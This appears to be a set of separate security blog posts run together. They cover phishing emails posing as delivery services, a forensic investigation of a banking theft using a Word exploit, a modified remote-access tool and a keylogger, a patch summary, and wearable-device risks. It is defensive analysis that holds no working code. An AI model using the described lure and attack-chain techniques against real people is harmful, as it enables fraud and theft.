Well-known companies and brands are favorite targets for fraudsters. After all, it is much easier to get people's attention with the use of a popular name, so scammers have more chance of trapping a gullible user.
In this article, we will analyze phishing and malicious emails sent by fraudsters on behalf of international delivery services. The most popular of these are DHL (Germany), FedEx and United Parcel Service (USA), TNT (Netherlands). All of these companies are international, with millions of customers using branches in major countries all over the world. They provide similar services, so scammers use the same methods and techniques in their fraudulent mails.
The phishers' goals include:
- Theft of confidential data (bank card credentials, logins and passwords from personal accounts), mainly with the help of fake web pages imitating official pages of the site. In a phishing attack users provides the fraudsters with their personal data by filling the fields on fake sites or sending them via email.
- Installing various malicious programs on users' computers. These programs are used not only to monitor user online activity and steal personal information, but also to organize botnets to distribute spam and launch DDoS attacks.
Structurally, the address in the From field looks like this: Sender Name . To confuse recipients, scammers can change parts of the address and often make it look very similar to an official address of the delivery service.
There are several groups of email addresses seen in fraudulent emails:
- Email addresses which closely resemble companies' legitimate public addresses. Generally, they use the name of the company (DHL INC, TNT COURIER SERVICE, Fedex, etc.) as the sender name. The name of the mailbox often includes the words info, service, noreply, mail, support which are typical of email addresses used to send official notifications. The server domain name often has a real or very plausible company domain.
- Addresses which do not resemble legitimate company addresses. The sender name still reflects the company name (FedEx, DHL Service, FedEx.com) but the domain name usually belongs to a free email service or an absolutely different company. The email address could be taken from a real user (taken from public sources or hacked mailboxes) or automatically generated addresses. The latter usually appear as a random sequence of letters, words and numbers.
- Addresses that resemble e-mail addresses of company employees. The sender name may contain the name and surname of a supposed employee, or the company name, or a position (courier, manager, etc). The name of the email box usually contains the same name and surname as the sender name because any difference in the data may alert the recipient to a fraudulent email. Either the real company domain or other domains not related to delivery companies might be used as a domain name.
- Addresses which only indicate the sender's address without a name.
While analyzing sender address, remember that scammers do not need to hack the company servers to use the real company domain in the From field. They can simply insert the necessary domain name of the server into the From field.The Subject field
The subject of the fraudulent mail should capture the imagination of recipients and encourage them to open the message, but it also needs to be plausible. Therefore spammers choose common phrases typical of official notifications from delivery services. After sending a parcel or a document, customers worry about its successful delivery and try to follow its progress by reading any notification from a delivery service.
The most popular subjects are:
- Subjects related to the delivery/shipment (shipment notifications, delivery status, shipping confirmation, shipment documents, delivery information, etc.).
- Subjects related to tracking shipments, order information and invoices (the tracking number of the shipment, tracking the shipment, etc.).
- Subjects related to notifications about messages and accounts (creation and confirmation of accounts, new messages, etc.).
Scammers pay special attention to the design of the email. Their main goal is to make message as believable as possible. After all, if it looks suspicious, a potential victim will most likely delete it despite the attractive subject and plausible sender address. Let's analyze the basic techniques that fraudsters use to make emails look legitimate.Graphic design
All major international companies have their own corporate style, including wordmarks, graphic trademarks, corporate fonts, slogans and color schemes. These are used on the official website, in mailings and commercials, and in other design components. Scammers use at least some of these elements when designing fraudulent emails to make them look convincing. Usually phishers focus on logos because these elements are unique to each company and is an immediate identifying mark.
Examples of DHL company logos used in fraudulent emails.
Let's take a closer look at these examples. It's immediately obvious that the second example is very different from the company's official logo. Another sign of a forgery is the difference in size between the false logo and the original, as seen in the fourth example where the logo takes almost a third of the message. Here the plan is probably to attract the reader's attention with a large bright picture rather than plain text. That also explains why the phishing links appear in a larger font: users should respond to it immediately, without trying to read the small print.
In the first example, the scammers are trying to copy the design from the official site (a very popular method). However the logo is placed on the right-hand side rather than on the left. Also they are using a color blend for the logo background rather than making it single-color. The logo in the third example most closely imitates the original DHL logo: the scammers have tried to match its size and design. It's not really all that difficult to make a logo for a fake notification: there are plenty of versions of the original image available online in several formats, including vector graphics. In addition to the logo the fraudsters use the color spectrum chosen by the company in its official resources and mailings. For example, for DHL it is a combination of yellow and red.The text design
In most official emails we find a number of set phrases, especially when it comes to standard notifications generated and sent automatically. These messages often include contacts and links to the official resources of the sender. Therefore, to make the text of the fake email look like an original notification from a delivery service the fraudsters use:
- Standard phrases typical of official mass mailings: Please do not reply to this email, This is automatically generated email, please do not reply, All rights reserved, Diese Versendung ist automatisch, Bitte beantworten Sie diese nicht, This communication contains proprietary information and may be confidential. Questo e' un email automatico, Si prega di non rispondere, etc.
- Links to the official page of the company. Not all links contained in the fraudulent email are phishing - spammers may also use the links which really lead to the official resources on order to make their emails look legitimate and bypass spam filtering.
- Contact for feedback. The fraudsters often indicate the contact information of the sender or the company (name, surname, position, office address). These contacts might be real or fictitious.
When fraudsters send out fake emails convincing readers that it is a real message is only part of the battle. The next step is to persuade the potential victim to do what the scammer requires, such as providing personal information or installing a malicious file. This is where psychology comes into play, and the email content is the main tool.
In fraudulent notifications allegedly sent on behalf of delivery services often use the following tricks:
- Notifications of various problems (eg. unsuccessful delivery, lack of information, wrong address, no recipient at the delivery address). These phrases are usually related to the delivery since the companies in question are in the service sector. Therefore, a logistics company warning of a problem with a delivery doesn't prompt any suspicion, especially if the email contains some details of the situation.
- A demand to do something or face some consequence. For example, "collect your parcel within 5 days otherwise it will be returned to the sender".
- Phrases about the content of an attachment or link (invoices, detailed information, documents).
- Phrases about the need to do something (follow a link, open an attachment, print out a file, etc.).
The scammers use deadlines like this to make recipients react immediately. The phishers hope that users will be so worried about losing the parcel or paying extra costs that they won't hesitate to provide personal details or open a suspicious attachment.
Users are unlikely to open unknown attachments or follow unknown links. That's why scammers imitate official websites and present malware as a document with information a parcel. In addition, if the text of the notification states that the attachment contains, for example, a consignment document, the malicious archive will have a similar name, such as "consignment.zip." This applies to phishing links as well - scammers name their links with an appropriate phrase from the text, such as "shipping information".
This simple trick is intended to reassure recipients that the attachment or link is perfectly legitimate.
Assuming the fraudsters have convinced the recipients that the email is real, the next step is to tell the victims how to solve their problems. Fulfilling these instructions is the ultimate goal of the fraudulent email. Here it is important for the scammers not just to tell recipients what they need to do, but to make them understand correctly what is written in the message. To avoid any misunderstanding on the part of the recipients, messages often contains detailed instructions about what to do.
Cheating the user is not the only thing scammers have to do. They also need to bypass spam filters and deliver the email to the email boxes of potential victims. One of the most popular and long-used methods to bypass filtering is to change text fragments within the email. Modern programs designed to send out spam messages include ample opportunities to generate multiple changes in the text. The text of a message which varies from email to email makes the email unique, while different personal information specified within one mailing (such as the number of the shipment, the form of the address, the dates) helps to convince recipients that the email is intended for them. In addition, the fraudsters can send out emails designed in the same style for several months - they only need to change some elements in the text.
Fraudulent notifications from delivery services can change:
- The information about the order/shipment, including the tracking number of the shipment, delivery dates, etc.)
- Contact details, sender names and company names. Some mass mailings provide an e-mail address or a phone number of a company representative for feedback. This particular data changes from email to email. In addition, names of company representatives and even company names themselves may also vary.
- The name of the attachment. It mainly refers to malicious attachments which names vary in messages within one mass mailing while these different names hide one and the same malicious program.
- Links. In phishing emails and emails with malicious attachments scammers often specifically change the addresses of the links, masking them with the help of different URL shorteners. Most of these links are quickly blocked by current antivirus programs.
- Phrases indicating numbers and dates. These can refer to timetables (days, hours), sums of money and dates (day and month)
- The greeting. Here spammers generally use the email address and/or the name of the recipient. Sometimes they use generic expressions (Dear client, Dear customer, etc.) instead.
- Other text fragments. Some words are replaced with other phrases that have a similar meaning so the general sense of the sentence remains unchanged.
Let's analyze some examples of changes in the text of fraudulent emails.
Below are some emails from yet another mass mailing.Fake pages
To steal personal information from users, scammers create phishing HTML pages which partially or completely copy the official website of a company. If victims of fraud enters their personal information (bank details, usernames and passwords) on this page, that data immediately falls into the fraudsters' hands.
To mask the links leading to phishing websites the fraudsters often use popular free URL shorteners. In addition, most services offer customers the ability to view the statistics on the short link which tells fraudsters more about the number of clicks on any links etc. Phishing pages can be located on specially registered domains which usually have a short life span as well as on compromised domains whose owner may not even be aware that the web site is being used for fraudulent purposes.
Let's analyze a fake email sent on behalf of FedEx in which recipients are asked to update their account information. The text of the email contains a link to the official website of the company while the real address to which the user is redirected is nothing like the legitimate page and is located on a free URL shortener service. This becomes obvious when you hover on the link.
After clicking the link, users get to a fraudulent page imitating the official website of FedEx, where they are asked to enter their logins and passwords to access their accounts. Once the users fill in the fields and click "Login", the entered information is transmitted to the scammers who can then access the victims' personal accounts. The menu tabs and other links on the phishing page are often inactive, so clicking on them will not take users to the appropriate page. However, in some cases, phishers imitate all links on the page so that users do not have any doubt about its legitimacy. Sometimes the design of the page imitates the official site but does not copy it completely. If you have a closer look at the details, you will see some differences between the designs of the real and the fake pages. However, most users do not pay attention to small details and this carelessness helps the scammers to steal personal information.
Below is yet another example of an email sent on behalf of FedEx. This time it contains a malicious link. The email informs recipients that delivery is impossible because of missing information. And now users have to follow the specified link for verification.
The link leads to a fraudulent page where potential victims are invited to download a program that will supposedly check whether they are really going to receive a parcel. Naturally, the program turns to be the well-known Zeus Trojan, which helps the fraudsters to access the computer and all the personal information on it.
Scammers might not only include a phishing link in the body of the email, but also attach an HTML phishing page designed to steal personal data. However this use of HTML attachments as phishing pages is unusual for fraudulent mailings sent on behalf of delivery services.Fraudulent emails in different languages
To increase the audience of recipients and customers, spammers are mastering new languages. In addition to traditional English and German, current spam traffic includes emails in Hebrew, Albanian and other languages which were found in advertising and fraudulent mailings a few years ago. For example, you may come across fake notifications from international delivery services written in Italian and Dutch. These emails do not have any special features that distinguish them from English- or German-language messages - to cheat users, the fraudsters resort to the same tricks.
For example, this Italian-language fake notification from FedEx tells users to confirm their identity by following a fraudulent link.
Yet another mass mailing in Italian contained a malicious archive which included the Zeus/Zbot Trojan used to steal personal data. The fraudulent email claimed that the user profiles on the website had been updated and there was more detailed information about it in the archive.
Another fake notification written in Dutch on behalf of TNT informs recipients that new accounts have been formed for them, with details in the attachment. The archive attached to the email contains Backdoor.Win32.Andromeda, a malicious file that allows the scammers to control the infected computer without the user knowing.Malware in fraudulent emails
Spam is one of the most popular ways of spreading malware and infecting computers on the Internet. Attackers have various tricks to make victims install malicious software on their computers. Email traffic includes a variety of private emails, such as wedding invitations, dating offers and other similar messages. However, fake notifications from well-known companies and brands providing different services remain the most popular cybercriminal trick. International delivery services are also used by spammers as a cover for malicious spam.
Malware spread in fake notifications from delivery services is divided into:
- Trojan programs developed to perform unauthorized operations in order to delete, block, modify or copy data, to disrupt computer or network performance. Trojans distributed in spam include Backdoors, Trojan-Downloaders, Trojan-Proxies, Trojan-PSWs, Trojan-Spies, Trojan-Bankers and others
- Worms, malicious programs capable of unauthorized self-proliferation on computers or computer networks. Those copies go on to spread themselves further.
What is dangerous about malicious programs?
- They can steal usernames and passwords from users' accounts, as well as financial or other information sought by the attackers.
- They can create botnets for distributing spam, DDoS attacks and other criminal activity
- They can provide fraudsters with control over victim computers, including the ability to run, delete or install any files or programs.
Current malicious programs integrate broad-ranging fraudulent functionality. In addition, some malicious programs can download other malware, providing additional opportunities. These might include stealing usernames and passwords entered in the browser or seizing remote control over the whole computer.
Malicious objects in fraudulent notifications can be embedded directly in the email or downloaded from a link provided in the body of the message. The most dangerous thing about it is that malware can be run and installed without users being aware or installing any software themselves. Typically, malicious ZIP (less often RAR) files enclosed in fraudulent emails have an executable .exe extension.How to recognize phishing emails
Below are a number of features that can help to identify a fraudulent email.
- The sender address. If the sender address includes a random sequence of letters, words or numbers, or the domain has no connection with the official address of the company, the emails should undoubtedly be considered fraudulent and deleted without opening.
- Grammar and spelling mistakes. Wrong word order, incorrect punctuation, grammar and spelling mistakes can also be a sign of a fraudulent mailing.
- Graphic design. Scammers are doing their best to make the email look very similar to the original. To this ends they are trying to imitate other companies' corporate styles using some of their elements such as color schemes and logos. Inaccuracies and noticeable design errors are among the signs of a fake email.
- The content of the email. If the recipient of the email is asked under various pretexts to urgently provide or confirm personal information, download a file or a link – especially while being threatened with sanctions for not doing so – the email may well be fraudulent.
- Links with different addresses. If the address of the link specified in the body of the email and address of the actual link to which you are redirected do not match, you are definitely looking at a fraudulent email. If you are viewing your email from the browser, the actual link can be usually seen in the bottom left of the browser window. If you use an email client, the actual link can be displayed in a popup window if you hover the cursor over the link in the text. Fraudulent links can also be attached to a text phrase in the email.
- Attached archives. Generally, ZIP and RAR archives are used by cybercriminals to hide malicious executable EXE-files. Therefore, you should not open these archives or run the attached files.
- Lack of contacts for feedback. Legitimate emails always provide contact information for feedback - either the company or the sender's personal contacts.
- Form of address. Fraudulent emails do not necessarily use the first name or the surname to address the recipient; sometimes a universal form of address ("client", etc.) is used.
More and more companies are asking Kaspersky Lab to carry out detailed investigations of malware-related IT security incidents affecting their business.
In this article, we will describe a typical cybercriminal attack aiming at stealing corporate financial assets from a remote banking system.Description of the Incident
An organization recently asked Kaspersky Lab to investigate an incident that had occurred in its corporate remote banking system: a bank representative contacted the organization's accounting department and asked for confirmation of a payment worth 3 million rubles (about US$80,000). It transpired that nobody in the organization had ever heard of this payment. The accountant was certain that he did not make that payment; he explained that he was out on his lunch break at the time of the transaction.
The accountant used banking software on his workstation to prepare payment orders and send them to the bank. The logs on this software recorded two suspicious payments to the same address. The first was a relatively small payment of 300,000 rubles. This did not sound any alarm bells, and was processed without a query. The second payment, worth 3 million rubles, alerted the staff at the company's bank.
It was clear that the accountant had not made the payments himself, so the organization suspected a malware attack. But how was that possible? They were using specialized banking software with password protection. They required a special file to access the remote banking system, and the bank itself would check the IP address of the sender of any payment.Investigation
The main goal of a malware incident investigation is to accurately assess the consequences of the attack, identify every compromised computer and establish exactly how the malware penetrated the victim computer(s). The organization affected can then use this information to effectively mitigate the damage and address weaknesses in its corporate security system to prevent such incidents from happening in the future.
During the investigation, it is also sometimes possible to detect hitherto-unknown malware species and add their signatures to the security databases, protecting other users from their future impact.
In this case an image of the hard disk from the accountant's desktop was provided to Kaspersky Lab's Global Emergency Response Team (GERT) for analysis and investigation.Remote Access to Desktop
During our first-pass analysis of the accountant's hard drive, we identified a modified version of the legal Remote Manipulator System which enables remote access to the computer. This type of software is often used by accountants and system administrators. However, this program was located in a suspicious catalogue, had a suspicious name ('C:\windows\dotcom\wmiterm.exe' is an overly "system-related" path , so even an advanced user is unlikely to smell a rat), and had two modifications to conceal its operation:
- The icon in the Windows Task Bar was hidden,
- The Registry key where the program stores its configuration was modified: 'HKLM\SYSTEM\Remote Manipulator System\v4' was changed to 'HKLM\SYSTEM\System\System\Remote\ Windows', which again looks very similar to the system registry key.
These modifications are typical of malware, so we added signatures for this program to Kaspersky Lab's antivirus databases – it is detected as malicious with the verdict 'Backdoor.Win32.RMS'.
While analyzing the operation of Backdoor.Win32.RMS, we discovered that the cybercriminals used it to download another malware program onto the victim computer, 'Backdoor.Win32.Agent'. (This detection was added to Kaspersky Lab products immediately). That backdoor provided remote VNC (Virtual Network Computing) access to the victim computer. Interestingly, the code of this malware program has a lot in common with the 'hVNC' module of the Carberp Trojan. Carberp's source code is available for public access.
So, how did Backdoor.Win32.RMS sneak onto the accountant's desktop?Infecting a Corporate Desktop
In the Microsoft Outlook database, stored in the file 'outlook.pst' on the hard drive, we found an email containing an attachment named "запрос ИФНС № АС-4-31339.doc" ('Federal Tax Service request no. AC-4-31339.doc'). Kaspersky Lab Anti-Virus detected that Microsoft Office document as malicious with the verdict 'Exploit.MSWord.CVE-2012-0158.'
The cybercriminals used social engineering methods: the email was sent in the name of Russia's Federal Tax Service, called for immediate action, and provided contact details of real Tax Service officers.
"Federal Taxation Service. Please provide all required documents as soon as possible."
The accountant would certainly have opened the attachment, which exploited a vulnerability in Microsoft Word to download a self-unpacking archive from a remote server and then initialize the unpacking. The archive contained two files: 'SYST.EXE', a renamed version of the file archiver '7zip', and 'SYST'.
While unpacking, the source archive launched the archive program 'SYST.EXE' with parameters instructing it to unpack the password-protected archive 'SYST' using the incorporated password. This trick of using a password-protected password successfully bypasses security software's attempts at static unpacking of the file, impeding its detection.
Unpacking 'SYST' created the following: the 'Backdoor.Win32.RMS' file (which we detected earlier) and the 'INST.CMD' script which installed the backdoor in the system. This is the script that copied the malicious program's files into the folder 'C:\windows\dotcom'.
After we detected the backdoors, we began to understand how the cybercriminals could steal the money. If they had remote access to the computer, they could have make their own payment order, and then the key file and the sender's IP address would be legitimate. But we still didn't know how they criminals got the password to access the banking software. We decided to look for a keylogger program.The keylogger
The file 'Svchost.exe' attracted our attention, located in the root of the system disk. It turned out to be a keylogger (detection added with the verdict 'Trojan-Spy.Win32.Delf'); it also contained functionality to manage the configuration of Backdoor.Win32.RMS. This unusual capability was apparently introduced by the cybercriminals because they needed a tool to control the modified Remote Manipulator System: they had hidden this program's entire user interface and could use it to manage the configuration.
We also discovered that this keylogger was downloaded with the help of Backdoor.Win32.RMS.
The keylogger sent a log containing all stolen information to the C&C at regular intervals and kept an up-to-date copy of the log on the infected computer's hard drive. We found the banking password within the piles of information stolen by the keylogger.The battle plan
Following our research, we reconstructed the cybercriminals' action plan:
- The cybercriminals launched a targeted attack using social engineering and a Microsoft Word vulnerability to infect the accountant's computer with Backdoor.Win32.RMS.
- With the help of that backdoor, the cybercriminals loaded two more malicious programs onto the victim computer: a keylogger (Trojan-Spy.Win32.Delf) and another backdoor (Backdoor.Win32.Agent) which establishes remote VNS access to the victim computer.
- The keylogger intercepted the password to the remote banking account.
- While the accountant was away from his computer, the cybercriminals used Backdoor.Win32.Agent and the VNS access to the computer to start the banking software on behalf of the accountant.
- The cybercriminals used the password intercepted by the keylogger to create a payment order worth 300,000 rubles and send it to the bank.
- A bit later, they created another payment order, this time worth 3 million rubles, and sent it to the bank.
As we got towards the end of the investigation, we discovered yet another interesting fact: the IP-addresses of C&C servers for all malicious programs used in the attack belonged to the same sub-network.
Diagram of the cybercriminal attack
We also found out that the cybercriminals acted very fast: it took them just four days to carry out their planned crime. Three days were spent preparing, and the plan was executed within just a few hours on the fourth day.
Day 1. The cybercriminals sent the email to the company's accountant. The accountant read the email, opened the attachment, and the malicious program Backdoor.Win32.RMS was downloaded to his program. On the following days, the cybercriminals used this program to watch the accountant's activities.
Day 4. The cybercriminals used Backdoor.Win32.RMS to load the keylogger Trojan-Spy.Win32.Delf to the victim computer and intercepted the password to the banking software. Soon afterwards they loaded Backdoor.Win32.Agent and used it to connect to the accountant's computer. Then they sent payment orders from the victim computer to the bank.Notifying the cybercriminals' victims
As the cybercriminals used several IP addresses from the same sub-network, we decided to have a closer look at the C&C servers. As it turned out, the cybercriminals made a mistake when configuring one of the servers, so any user can see the HTTP requests to the C&C servers. That's how we were able to track down the IP addresses from which requests were sent using the keylogger's protocol. As we found out, there were several computers with different IP-addresses infected with the keylogger.
There was one odd feature of this keylogger: when it was launched on an infected computer, it downloaded the latest version of its log from the C&C server. Thus, any user could review the keylogger's log if they opened the appropriate URL address in their web browser. We decided to have a close look at the HTTP requests sent to the C&C server, and in them we found the names of the logs that the keyloggers sent to the C&C server. In many cases, the logs contained the name of the organization which owned the infected computer and the victims' contacts (We could also find the victims' IP addresses using the vulnerability in the C&C server). This information helped us contact other victims (most of them were accountants at SMBs) and warn them that their computers were infected. They were very grateful for the information.Features of banking attacks
As we said at the beginning of the article, this attack is a typical case of stealing money from a company.
- Cybercriminals actively use social engineering to encourage users to open the malicious file.
- When attacking important targets, cybercriminals may use new exploits for previously unpublished vulnerabilities. In such cases regular attack detection tools, such as IDS, are not good enough.
- Yet another feature of this attack is that it involves legal software. This is a growing trend: we see cybercriminals using legitimate applications to gain remote access to victim computer before downloading and launching malicious files on them.
Members of staff who deal with commercially important information and handle the company's finances need training on the basics of IT security. The company must implement security policies that would minimize the risk of employee negligence causing an infection on the corporate network.
However, 0-day exploits are too expensive to use in attacks on regular companies. Here we usually see exploits for known vulnerabilities. This means simple steps like promptly updating software (especially Microsoft Office and Java) and installing a quality security solution can ensure adequate levels of protection.
Security products obviously won't flag up the use of legitimate software. So cybercriminals can use these applications in a bid to keep their operations secret. In this attack, secrecy was ensured by using a version of Remote Manipulator System with modifications introduced into its executable file. We added a signature for this modified version of Remote Manipulator System so in future Kaspersky Lab's products will detect it.
If cybercriminals use the original, unmodified versions of legitimate software, the only solution will be for security systems to notify the user every time a potentially unwanted program is launched. All users, especially those who deal with financial and other important documents, must remember that no security system can provide absolute protection. They should pay attention to system notifications and be alert to any anomalous behavior on their computer. It's important to notify security staff of any suspicious event in the system.
Ideally, default deny mode should be enabled on all computers used to make payments in a remote banking system; this mode restricts Internet access and prevents the launch of irrelevant, non-whitelisted software. The same applies to computers used by corporate users to work with commercially important (business-critical) information.Conclusion
These days, the main driving force behind all cybercriminal actions is money. Gaining access to remote banking systems is the most direct and straightforward way of stealing money from an organization. It is little surprise that remote banking systems are an increasingly attractive target for cybercriminal attacks.
Anyone who uses remote banking systems is more than familiar with the security systems incorporated in them … but so are the cybercriminals. The use of passwords, key files and tokens, as well as restricting IP access, can lull users into a false sense of security.
However, none of these measures, whether taken individually or as a group, will do anything to enhance security if they are implemented on a compromised computer. On an infected machine, passwords can be intercepted, key files can be copied. Cybercriminals can create a hidden desktop and use the original IP address and the token connected to the victim computer.
When investigating security incidents we regularly encounter the following situation: a malicious program is launched on a computer, but later it is detected and removed from the system. Subsequently the affected computer is used as before, continuing to carry out banking transactions with the accountant confident that the problem has been solved.
Users must realize that once a malicious program is executed, the computer affected should be considered compromised. The first malicious file only loads the main malicious payload. That payload typically consists of programs which update themselves all the time to escape detection by security products. Alternatively, cybercriminals load legitimate software with modifications that enable cybercriminals to connect to it via malicious C&C servers. In this case the malicious programs will not be detected.
Overlooking this can cause huge damage to a company. If a malicious program has been detected on a computer with critical information, incident response measures must be taken immediately.
Sadly, our experience shows that organizations often sound the alarm too late, when they are already facing financial loss or the shutdown of critical computing services. Moreover, the response measures taken within corporations usually prove ineffective, and often impede further investigation.
There is no such thing as a one-size-fits-all response to an incident. There are too many possible attack methods out there. For example, in some cases shutting the computer down immediately helps to preserve data that would be irreversibly deleted by a malicious program after a certain period. In other situations, though, a shutdown will destroy the RAM data that is vital to a subsequent investigation. Only an incident investigation specialist can make the right decision.
In any case, if there is the slightest suspicion of intrusion, any compromised computer should be disconnected from the Internet and the corporate network, and malware incident specialists should be called in.
Only a detailed investigation of a security incident can lead to an effective response.
Microsoft released four security bulletins this month addressing a total of 42 vulnerabilities in Internet Explorer (MS14-052), .NET (MS14-053), the Windows task scheduler (MS14-054), and several issues in Windows Lync Server (MS14-055). I counted a total of 37 cve set aside for Internet Explorer, with the other five for the three remaining software.
Most interesting is the XMLDOM vulnerability (cve-2013-7331), a vulnerability that has been publicly discussed since at least April 25, 2013. The PoC was re-purposed and abused in the VFW watering hole attack by APT otherwise known as Aurora Panda or "the DeputyDog actor". The crew is highly advanced and effective in technique and operation, over time deploying multiple 0day to meet their heavy offensive needs. Their xmldom trick likely helped to delay discovery of their IE 0day and presence on the compromised VFW server. "The attacker can easily diagnose whether the machine is running EMET by loading an XML string. If the parsed return code fails, it means EMET is not present and the attacker can proceed with the exploit". Microsoft rated this vulnerability patch "important" across OS versions, while the other privately disclosed IE vulnerabilities are rated "critical".
The other 36 Internet Explorer memory corruption vulnerabilities are all over the board as far as exploitability per platform, but they all enable remote code execution. It's most interesting that the patches for Internet Explorer v10 and v11 on supported Windows 8.1 are rated Critical RCE.
Also this month is a task scheduler escalation of privilege vulnerability reminiscent of one of the Stuxnet 0day that Kaspersky Lab researchers reported back in 2010, and was later deployed by the Tdss gang. And an update to an advisory went out to deal with post-exploitation lateral movement. This time the patched issue is not related to older pass-the-hash issues, but Kerberos ticket grant delay related. The logon credential cleanup package can be downloaded here.
More can be read about September 2014 Microsoft Security Bulletins here.
The world's largest mobile innovation forum, "Super Mobility Week", is being held in Las Vegas. We were there to participate and moderate a panel on mobile and cloud cyber-security with speakers from Verizon, Samsung, and Eriksonn Mobile.
The event maintains an impressive vendor floor and multiple stages for discussions and panels throughout the days. The floor hosts vendors presenting their newest products, including wearables and other IoT. The afternoon keynotes yesterday brought a switch from the planned Twitter's CEO to their "President of Global Revenue" Mark Bain, who spoke about both their technology push onto wearables and IoT, and a glimpse into their data mining capabilities derived from their Gnip acquisition. It's notable that he didn't mention anything about security or privacy. Two factor authentication is ancient history for them, while Apple and their customers unfortunately continue to learn the hard way that some inconvenience is a small tradeoff for privacy and security.
Microsoft also keynoted, bringing their EVP of Devices Group onstage to discuss their push into mobile to cloud technologies with Nokia devices and "Cloud OS". Again, no mention of security baked into these technologies, although we haven't seen any recent naked celebrity photo theft from the Microsoft cloud.
My panel's discussion weaved mainly in and out of enterprise wide security challenges to BYOD and cloud adoption, along with recent and relevant threats that we noted:
1. The recent Apple iCloud mess revealed several things
- Apple provided password and knowledge based authentication services that enabled social engineering and brute force attacks and dismissed 2FA (until now). On cloud service authentication security, Apple "led from behind"
- Apple's cloud security enabled brute forcing of both AppleIDs and iCloud passwords
2. Mobile malware volumes continue to surge - our mobile malware collection now includes almost half a million samples. Digging deeper, in 2013, we saw around 600 mobile banking trojans and now our malware collection maintains around 8,500 banker variants specifically supporting financial cybercrime.
3. Wifi and Ssl insecurities, as implemented in and used by mobile technologies, are on the increase and will likely continue to be.
4. Targeted attackers express interest in an expanded set of technologies, including various mobile devices by the Rocra, LuckyCat and Chuli attackers.
The event lasts from September 9th to the 11th.
Technology has changed our lives, the way we live and work. With the emergence of wearables, the convergence between the virtual and the physical world makes people feel more natural using technology all the time.Google Glass is one of the most amazing wearable devices and although it is still at an early stage of development, it is undeniable that you can do awesome things and experience the world in a different way with them.
With out-the-box functionality, you can search the internet, take pictures or videos, check mail, send messages to Hangouts contacts, or publish information to Google+. What truly excites us are foreseeable uses in fields like medicine or education. The device could become indispensable by helping surgeons check patient vital signs or video broadcasting their surgeries to other specialists. Similarly, we can foresee novel means of transmitting knowledge to students in interactive ways. Perhaps we can even imagine enhancements to law enforcement by enabling immediate recognition of wanted criminals.
Unfortunately, the emergence of new technologies also entails new security risks. There are in fact many concerns about potential risks to privacy and ways in which these new devices could be compromised. Cybercriminals don't rest and are always looking for new ways to obtain gains from their victims, whenever they see an opportunity they will work day and night to achieve this objective.New Technologies, Old Risks.
New and existing devices have many things in common: they use the same protocols and are interconnected with other devices using similar applications. There is no way around this. Traditional attack vectors are mainly against the network layer in the form of Man-in-The-Middle (MiTM), the exploitation of some vulnerability in the operating system, or the applications themselves. Being based on Android, Glass could inherit known vulnerabilities found in other devices with the same OS.
There are two ways to surf the Web from Google Glass: through Bluetooth pairing to a mobile device that shares its data network connection, or directly through Wi-Fi with prior configuration of the network via a MyGlass account or mobile app generated QR code.
The procedure to add a network is pretty simple: by adding a network name and password a QR code is generated containing connection settings which when looked at through Glass establishes an automatic connection to the network.
Last year, a vulnerability was published by the Security firm Lookout related to this procedure that would mislead a user to connect to a fake access point through a malicious QR thus allowing a potential attacker to hijack network communications and possibly redirect navigation to a malicious web page that could exploit a known Android web vulnerability. This vulnerability was patched but gave us a clear sense that attackers could discover ways to compromise these new devices.
A source of potential risks is that unlike a computer or a mobile device, the Glass interface is navigated through 'cards' to scroll through the different applications and settings thus limiting configuration options and in some cases automating certain procedures and functions with little input from the user, as in the case of connecting to a network or sharing information. This automation opens the door for exploitation by attackers and the compromise of user privacy.
Another threat avenue is the propensity for users to activate 'debug mode' in order to install applications outside of the official glassware ecosystem thus raising the risk of installing malicious applications.
This opens the possibility of new attacks using old methods such as social engineering through the use of the magic words: "free" and "sex". Although not all apps advertised this way are malicious, the terms stand as a hook for users in search of new experiences, willing to step out of the comfort zone pre-arranged by the manufacturer.
As mentioned earlier, a feature distinguishing Glass from other wearables is the ability to navigate the internet directly via a Wi-Fi connection, rather than exclusively piggybacking off of a paired mobile device. However, this ability also means that the device is exposed to network vectors attacks, particularly MiTM.
Imagine this scenario, you are at your favorite coffee shop and decide to connect to the Wi-Fi network using Glass. You set up the network and are off to check-in on Foursquare, launch an app to recognize the song playing in the background and fetch the lyrics. But what if in this network someone is using a tool to poison the other devices into redirecting traffic towards a router IP address thus capturing all of the network traffic?
We tested by doing just that in a controlled laboratory network. Once the network was compromised, we did some searches on google, standard site browsing, sent pictures and messages to some of our contacts, and even read the news.
Once we captured enough traffic to analyze, we found that almost all the traffic remains encrypted after the network was compromised, specially the google searches. However, we found enough information in plain text to correlate and piece together the user's navigation to airlines, hotels, and touristic destination sites and how and where the device was connected. Nothing too sensitive but in some cases useful for when carrying out a profiling job.
In the end, as with any other device, security must be visualized in layers and we need to protect every layer to reduce the risk of compromise. In this case, the network layer could be exposed since the device can connect to public networks but lacks the option for VPN connections thus insuring traffic can be captured and analyzed.
In coming months, we'll see wearable devices becoming the next attack targets, highlighting the need to pay special attention to these devices, their capabilities, and the information they handle.
You can also follow me on twitter @r0bertmart1nez
Now that the Internet of Things is all the rage, I wanted to take a look at a trend in IoT that I find particularly exciting and that's wearable devices. In theory, wearables could present us with a paradigm shift in the manner in which users interact with technology, moving us away from the old mouse and keyboard combo, and possibly even the touchscreen. For now, we are not quite there and science fiction superlatives are premature. At this time, wearables are in simplest terms appendages of our mobile phones. They're meant to more conveniently convey notifications, collect heartbeat measurements, and throw an alternate camera angle into the selfie-filled mix. Though wearables are still in their infancy, rising adoption highlights the need for a discussion about the concerns that could accompany these new technologies. Let's attempt to carry out this discussion in two modes: current privacy issues and future overall security concerns.With Creepy Enthusiasm
Sadly technology isn't always used in the benevolently child-like way we intend; gone are the days of look-what-I-can-do wonderment.
Instead, we see users adapting technologies old and new to satisfy base desires. A recent twitter-storm documented by Gawker showed just that, as a Chinese Glass Explorer was found using his new device to upload unsolicited pictures of women in public places to his twitter account. His actions fit into a reprehensible internet subculture of fetishizing 'creepshots' that has caused great uproar. Unfortunately, the principal design tenets of wearables have the unintended corollary of making perfect devices for this community of perverts.
With an unassuming device and a nearly undetectable camera, a wearable can be used as a predatory tool for violating the privacy of unsuspecting bystanders. During our Latin American Security Analysts Summit, Roberto Martinez and I took up the mantle of predatory wearable users, taking candid pictures of our guests to display during our presentation. I'm disappointed to say it was incredibly easy to get away with. In the case of Roberto's Glass, the wink feature (which allows the user to take a picture by simply winking in the direction of the target) was indispensable to our experiment. In my case, I had a Galaxy Gear 2 which Samsung had cautiously programmed to accompany pictures with a loud noise in order to alert nearby targets.
